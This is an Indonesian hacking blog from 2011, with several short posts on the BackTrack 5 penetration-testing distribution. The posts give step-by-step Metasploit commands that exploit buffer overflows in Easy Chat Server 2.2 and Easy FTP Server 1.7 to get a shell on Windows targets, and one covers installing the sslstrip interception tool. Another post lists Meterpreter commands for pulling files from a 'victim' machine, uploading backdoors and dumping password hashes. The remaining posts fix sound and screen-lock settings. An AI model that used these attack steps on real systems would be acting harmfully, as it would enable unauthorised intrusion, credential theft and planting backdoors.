Wednesday, September 28, 2011

Install sslstrip di Backtrack 5 R1

Suatu ketika pas ane mau menggunkan sslstrip, ane lupa kalau diBacktrack 5 kan itu aplikasi belum terinstall, oleh karena itu ane mau bantuin agan-agan yang juga punya masalah sama kaya untuk bisa menggunakan sslstrip.


1. Download filenya.
root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz


2. extrack filenya.
root@bt:~# tar zxvf sslstrip-0.9.tar.gz 


3. lakukan instalasi.
root@bt:~# cd sslstrip-0.9
root@bt:~# python setup.py install


4. Selamat menikmati.
root@bt:~# sslstrip


Semoga membantu.

Tuesday, September 27, 2011

Exploit Easy Chat Server v2.2

Sekarang kita akan melakukan Exploitasi terhadap Easy Chat Server v2.2 menggunakan kelemahan pada authentication request request handling buffer overflow dengan exploit efs_easychatserver_username. Tanpa penjelasan yang panjang langsung kita praktekan.

1. Buka Metasploit
msfconsole


2. Jalankan Proses Explotasi.
use exploit/windows/http/efs_easychatserver_username 
set payload windows/shell/bind_tcp 
set rhost IP_Target
exploit


3. Hasilnya.


Note : Tehnik ini telah dicoba dan berjalan pada windows XP sp 1, Windows XP sp 2, Windows XP sp 3, Windows 7.

Perintah dasar Meterpreter

 Buat agan-agan yang sering menggunkan Metasploit pasti sudah sering menggunakan beberapa perintah dibawah ini ketika sudah mendapatkan meterpreter, jadi buat agan-agan yang ingin mendalami Metasploit, ini adalah wajib untuk dipelajari,termasuk ane,hoho..

1. help
Perintah ' help ' akan menampilkan menu help pada terminal.

2. background
Perintah ' background ' mengembalikan kita kepada prompt msf/prompt sebelum exploit dijalankan.

3. ps
Perintah ' ps ' digunakan untuk menampilkan proses yang sedang berjalan.

4. migrate
Perintah ' migrate ' digunakan untuk berpindah pada proses yang lain.

5. ls
Perintah ' ls ' digunakan untuk menampilkan daftar file dari sebuah folder tempat kita berada.

6. download
Perintah ' download ' adalah untuk mendownload file dari komputer korban, dan gunakan double-slashes ( \\ )untuk menetapkan direktori.

7. upload
Perintah ' upload ' adalah untuk mengupload file kedalam komputer korban(biasanya backdoor), dan gunakan double-slashes.

8. ipconfig
Perintah ' ipconfig ' untuk menampilkan kartu jaringan/network interfaces dan alamat korban.

9.  getuid
Perintah ' getuid ' adalah untuk menampilkan hostname dari komputer korban.

10. execute
Perintah ' execute ' adalah untuk menjalankan aplikasi para komputer korban.

11. shell
Perintah ' shell ' adalah perintah untuk mendapatkan shell dari komputer korban(biasanya command Prompt windows).

12. idletime
Perintah ' idletime ' adalah perintah untuk mengetahui lama waktu dari pemakaian komputer.

13. hasdump
Perintah ' hashdump ' untuk menampilkan data dari SAM file.

14. ?
Perintah ' ? ' adalah untuk menampilkan help dari meterpreter.

15. channel
Perintah ' channel ' untuk menampilkan channel yang sedang aktif.

16. close
Perintah ' close ' untuk keluar dari channel.

17. exit
Perintah ' exit ' untuk keluar dari session yang sedang aktif.

18. interact
Perintah ' interact ' untuk interaksi dengan channel.

19. irb
Perintah ' irb ' untuk menjalankan ruby shell command.

20. quit
Perintah ' quit ' kembali kepada terminal meterpreter dan keluar dari session yang aktif.

21. read
Perintah ' read ' membaca data dari channel.

22. run
Perintah ' run ' untuk dapat menjalankan script meterpreter.

23. write
Perintah ' write ' digunakan untuk menulis kedalam channel.

24. cat
Perintah ' cat ' digunakan untuk membaca sebuah file.


Cukup segini dulu y, karena masih banyak lagi perintah yang harus agan-agan ketahui jika ingin mendapatkan hasil yang maksimal dari sebuah exploitasi. Untuk perintah yang lain agan-agan bisa melihatnya di sini.

Exploit Easy FTP Server v1.7

Ane dapat Tutorial baru nih gan, lumayan nambahin pengetahuan kita-kita diblog ini. FTP Server merupakan sebuah server yang memanfaatkan File Transfer Protocol (FTP) untuk keperluan transfer file antar mesin pada jaringan TCP/IP, disini kita memanfaatkan celah keamanan yang terdapat pada aplikasi Easy FTP Server versi 1.7 pada buffer overflow yang dimana kita dapat memanfaatkannya dengan memasukkan input dalam bentuk exploit sehingga data-data yang disimpan melebihi kapasitas buffer memorinya. Intinya dengan proses tersebut maka kita dapat memasukkan berbagai shellcode untuk dijalankan di server, contohnya bind shell.

1. Buka Metasploit

msfconsole


2. Jalankan Proses Exploitasi

use exploit/windows/ftp/easyftp_cwd_fixret 
set payload windows/shell/bind_tcp
set rhost IP_Target
exploit


3. Dan dapatkan shellnya.


Note : Tehnik ini telah dicoba dan berjalan pada windows XP sp 1, Windows XP sp 2, Windows XP sp 3, Windows 7.

Bugs & Fixes Backtrack 5 R1 [Sound]

Kalau agan-agan menggunkan Backtrack 5 atau pun yang R1 mungkin telah menemukan bahwa fungsi sound tidak berfungsi dengan baik, oleh karena itu mari kita selesaikan disini.

1. Pergi ke System > Preferences > Startup Application



2. Kemudian Klik Add dan masukan Konfigurasi dibawah ini.

Name : Pulseaudio daemon
Command :/usr/bin/pulseaudio
Comment : Start the sound daemon


Logout dan Login kembali, selamat menikmati musik.

Monday, September 26, 2011

Membuat Screen Lock DiBacktrack

Kalau agan-agan pernah pake ubuntu, kan kalau mau setting ScreenLock bisa disetting diScreenSaver tuh, berhubung diBacktrack paket bawaan nya tidak menyertakan ScreenSaver ane memutuskan untuk membuatnya.Check It Out gan.

1. Install xlockmore

apt-get install xlockmore


2. Masuk kedalam pengaturan shortcut di System > Preferences > Keyboard Shortcuts


3. Cari Action Lock Screen dan disable


4. Kemudian klik tombol add untuk menambahkan shortcut baru


5. Isi Name : Lock Screen dan Command : xlock kemudian klik Apply


6. klik Shortcut yang baru kita buat kemudian tekan Ctrl + Alt + L untuk shortcut keyboard.


7. Ini hasilnya gan.

 
biz.